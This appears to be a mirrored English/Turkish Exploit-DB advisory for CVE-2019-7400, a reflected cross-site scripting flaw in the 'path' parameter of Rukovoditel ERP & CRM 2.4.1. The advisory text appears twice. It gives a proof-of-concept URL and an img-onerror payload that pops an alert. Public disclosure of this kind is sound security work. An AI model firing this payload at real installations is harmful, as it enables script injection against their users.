# Exploit Title/Exploit Başlığı: Rukovoditel ERP & CRM 2.4.1 - 'path' Cross-Site Scripting
# Exploit Author/Exploit Yazarı: Javier Olmedo
# Website: https://hackpuntes.com
# Date/Tarih: 2019-03-24
# Vendor/Yapımcı: Rukovoditel
# Software Link/Yazılım Linki: https://sourceforge.net/projects/rukovoditel/
# Affected Version/Etkilenen Versiyonlar: 2.4.1 ve muhtemelen öncesi
# Patched Version/Patch Atılan Versiyonlar: version 2.4.1
# Category/Kategori: Web Application
# Platform: Windows
# Tested on/Test Edilen Sistem: Win10x64 & Kali Linux
# CVE: 2019-7400
# References/Referanslar:
https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
# 1. Technical Description/Teknik Açıklama:
index.php kaynağından bir GET isteği ile path parametresi, Reflected Cross-Site Scripting (XSS) ataklarına karşı savunmasızdır.
# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=items/items&path="><img src=a onerror=alert("VULNERABLE")>
# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>
Exploit Linki:
https://www.exploit-db.com/exploits/46608
# Exploit Author/Exploit Yazarı: Javier Olmedo
# Website: https://hackpuntes.com
# Date/Tarih: 2019-03-24
# Vendor/Yapımcı: Rukovoditel
# Software Link/Yazılım Linki: https://sourceforge.net/projects/rukovoditel/
# Affected Version/Etkilenen Versiyonlar: 2.4.1 ve muhtemelen öncesi
# Patched Version/Patch Atılan Versiyonlar: version 2.4.1
# Category/Kategori: Web Application
# Platform: Windows
# Tested on/Test Edilen Sistem: Win10x64 & Kali Linux
# CVE: 2019-7400
# References/Referanslar:
https://hackpuntes.com/cve-2019-7400-rukovoditel-erp-crm-2-4-1-cross-site-scripting-reflejado/
# 1. Technical Description/Teknik Açıklama:
index.php kaynağından bir GET isteği ile path parametresi, Reflected Cross-Site Scripting (XSS) ataklarına karşı savunmasızdır.
# 2. Proof Of Concept (PoC):
# http://localhost/index.php?module=items/items&path="><img src=a onerror=alert("VULNERABLE")>
# 3. Payload
# "><img src=a onerror=alert("VULNERABLE")>
Exploit Linki:
https://www.exploit-db.com/exploits/46608
